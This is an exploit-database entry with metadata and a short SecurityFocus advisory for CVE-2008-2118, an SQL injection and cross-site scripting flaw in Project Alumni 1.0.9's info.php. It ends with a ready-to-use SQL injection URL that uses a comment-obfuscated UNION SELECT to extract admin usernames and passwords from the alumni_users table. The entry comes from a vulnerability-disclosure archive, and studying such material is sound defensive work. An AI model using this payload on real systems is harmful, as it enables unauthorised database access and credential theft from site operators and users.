Alumni 1.0.8/1.0.9 - 'info.php?id' SQL Injection
Author: hadihadi
type: webapps
platform: php
port:
date_added: 2008-05-02
date_updated: 2014-02-18
verified: 1
codes: CVE-2008-2118;OSVDB-45022
tags:
aliases:
screenshot_url:
application_url:
source: https://www.securityfocus.com/bid/29019/info
Project Alumni is prone to a cross-site scripting vulnerability and an SQL-injection vulnerability because the application fails to sufficiently sanitize user-supplied input.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
These issues affect Project Alumni 1.0.9; other versions may also be vulnerable.
http://www.example.com/info.php?id='/**/union/**/select/**/1,2,3,concat(alumniUserName,0x3a,char(58),alumniPassword),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/**/from/**/alumni_users/**/where/**/userType=0x61646d696e/*